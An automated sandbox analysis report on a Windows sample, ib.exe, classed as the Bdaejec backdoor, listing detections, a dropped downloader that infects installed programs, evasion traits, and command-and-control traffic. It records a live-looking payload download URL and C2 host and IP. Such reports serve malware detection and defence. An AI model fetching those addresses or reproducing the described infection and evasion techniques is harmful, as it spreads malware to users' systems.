Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ib.exe

Overview

General Information

Sample name:ib.exe
Analysis ID:1542812
MD5:1913f1b56f94a777c0130ef6e358586f
SHA1:b1bc6735532a06744d37245f172408f8c2f062b0
SHA256:79757b669da7754fb0319e313a1c24b9c9e170b7815174ca55959eb3bbca43f3
Tags:BackdoorBDAEJECexeuser-osuchdayu
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject threads in other processes
Found API chain indicative of sandbox detection
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • ib.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\ib.exe" MD5: 1913F1B56F94A777C0130EF6E358586F)
    • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hjErac.exe (PID: 6996 cmdline: C:\Users\user\AppData\Local\Temp\hjErac.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 5816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: hjErac.exe PID: 6996JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-26T13:52:04.339917+020028079081Malware Command and Control Activity Detected192.168.2.44973044.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-26T13:52:03.656735+020028385221Malware Command and Control Activity Detected192.168.2.4593341.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ib.exeAvira: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeReversingLabs: Detection: 97%
    Source: ib.exeReversingLabs: Detection: 94%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeJoe Sandbox ML: detected
    Source: ib.exeJoe Sandbox ML: detected
    Source: ib.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: ib.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
    Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00CB29E2
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00CB2B8C
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:59334 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E2130 Sleep,WSAStartup,WSAGetLastError,socket,WSAGetLastError,htons,inet_addr,setsockopt,sendto,sendto,WSAGetLastError,recvfrom,WSAGetLastError,sendto,WSAGetLastError,exit,0_2_003E2130
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: hjErac.exe, 00000002.00000003.1687849172.0000000000830000.00000004.00001000.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
    Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/cH
    Source: hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGsf
    Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGv
    Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarR
    Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarg
    Source: hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
    Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq
    Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: C:\Users\user\Desktop\ib.exeWindows user hook set: 0 mouse low level NULLJump to behavior
    Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_668a944f-e

    System Summary

    barindex
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: hjErac.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\ib.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003ECB710_2_003ECB71
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB6D002_2_00CB6D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\hjErac.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428
    Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: ib.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: hjErac.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: hjErac.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: hjErac.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@6/11@1/2
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_00CB119F
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rarJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
    Source: C:\Users\user\Desktop\ib.exeMutant created: \Sessions\1\BaseNamedObjects\Local\$InputBridge$
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6996
    Source: C:\Users\user\Desktop\ib.exeFile created: C:\Users\user\AppData\Local\Temp\hjErac.exeJump to behavior
    Source: C:\Users\user\Desktop\ib.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ib.exeReversingLabs: Detection: 94%
    Source: unknownProcess created: C:\Users\user\Desktop\ib.exe "C:\Users\user\Desktop\ib.exe"
    Source: C:\Users\user\Desktop\ib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ib.exeProcess created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428
    Source: C:\Users\user\Desktop\ib.exeProcess created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exeJump to behavior
    Source: C:\Users\user\Desktop\ib.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\ib.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Users\user\Desktop\ib.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\ib.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\ib.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\ib.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: ib.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: ib.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: ib.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: ib.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: ib.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: ib.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: ib.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: ib.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
    Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr
    Source: ib.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: ib.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: ib.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: ib.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: ib.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeUnpacked PE file: 2.2.hjErac.exe.cb0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: Hu
    Source: ib.exeStatic PE information: section name: Hu
    Source: hjErac.exe.0.drStatic PE information: section name: .aspack
    Source: hjErac.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.2.drStatic PE information: section name: PELIB
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.2.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003EBE7B push ebp; ret 0_2_003EBE7E
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003EBE85 push 00000000h; ret 0_2_003EC296
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB1638 push dword ptr [00CB3084h]; ret 2_2_00CB170E
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB600A push ebp; ret 2_2_00CB600D
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB2D9B push ecx; ret 2_2_00CB2DAB
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB6014 push 00CB14E1h; ret 2_2_00CB6425
    Source: ib.exeStatic PE information: section name: Hu entropy: 6.93404046385773
    Source: hjErac.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.934379842605089
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.93494119851436
    Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.933703573716871

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\Desktop\ib.exeFile created: C:\Users\user\AppData\Local\Temp\hjErac.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
